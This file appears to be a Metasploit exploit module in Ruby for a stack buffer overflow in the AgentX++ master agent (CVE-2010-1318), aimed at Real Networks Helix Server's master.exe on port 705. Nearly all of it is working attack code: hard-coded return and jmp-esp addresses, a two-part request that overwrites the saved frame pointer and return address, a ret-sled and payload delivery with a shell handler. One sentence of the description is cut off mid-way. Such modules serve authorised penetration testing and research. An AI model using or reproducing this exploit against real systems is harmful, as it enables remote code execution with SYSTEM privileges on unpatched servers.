138 lines
4.0 KiB
Ruby
138 lines
4.0 KiB
Ruby
##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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class MetasploitModule < Msf::Exploit::Remote
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Rank = GoodRanking
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include Msf::Exploit::Remote::Tcp
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#include Msf::Exploit::Remote::Seh
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',
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'Description' => %q{
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This exploits a stack buffer overflow in the AgentX++ library, as used by
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various applications. By sending a specially crafted request, an attacker can
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execute arbitrary code, potentially with SYSTEM privileges.
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This module was tested successfully against master.exe as included with Real
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Network\'s Helix Server v12. When installed as a service with Helix Server,
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the service runs as SYSTEM, has no recovery action, but will start automatically
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on boot.
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This module does not work with NX/XD enabled but could be modified easily to
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do so. The address
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},
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'Author' => [ 'jduck' ],
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'CVE', '2010-1318' ],
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[ 'OSVDB', '63919'],
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[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]
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],
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'Privileged' => true,
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'DefaultOptions' =>
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{
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#'EXITFUNC' => 'seh',
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},
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'Payload' =>
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{
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'Space' => 1024, # plenty of space
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'BadChars' => "", # none!
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'DisableNops' => true,
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'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"
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},
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'Platform' => 'win',
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'Targets' =>
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[
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[ 'Helix Server v12 and v13 - master.exe',
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{
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# The BufAddr varies :-/
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#'BufAddr' => 0xea3800,
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'BufAddr' => 0x1053880,
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'BufSize' => 25000, # If this is too large, the buf is unmapped on free
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'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe
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'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll
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}
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]
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Apr 16 2010'))
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register_options([Opt::RPORT(705)], self.class)
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end
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def exploit
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print_status("Trying target #{target.name}...")
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connect
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print_status("Triggering the vulnerability... Cross your fingers!")
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num = target['BufSize']
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num_str = [num].pack('N')
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# First send 19 bytes to almost fill the buffer...
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hdr = ''
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hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')
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hdr << rand_text(16 - hdr.length)
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#hdr << "QQQQRRRRSSSS"
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hdr << num_str[0,3]
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sock.put(hdr)
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# Wait to make sure it processed that chunk.
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select(nil, nil, nil, 0.5)
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#print_status("press enter to trigger..."); x = $stdin.gets
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# Send the rest (smashed!)
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hdr = ''
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hdr << num_str[3,1]
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# NOTE: this stuff is extra, but doesn't count towards the payload..
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hdr << rand_text(8)
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#hdr << "EEEEFFFF"
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# becomes ebp
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#hdr << "\xeb" * 4
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base = target['BufAddr']
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new_ebp = base + (num / 2)
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if (mod4 = (num % 4)) > 0
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# align to 4 bytes
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new_ebp += (4 - mod4)
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end
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hdr << [new_ebp].pack('V')
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# becomes eip
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#hdr << "\xef\xbe\xad\xde"
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hdr << [target.ret].pack('V')
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# NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun
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sock.put(hdr)
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# Send the data that we said we would...
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stack = []
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stack << target['JmpEsp']
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num_rets = (num - payload.encoded.length - 4) / 4
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num_rets.times {
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# points to ret instruction
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stack.unshift(target.ret + 3)
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}
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stack = stack.pack('V*')
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stack << payload.encoded
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# make sure we have all the bytes, or we wont reach the path we want.
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stack << rand_text(num - stack.length)
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sock.put(stack)
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handler
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disconnect
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end
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end
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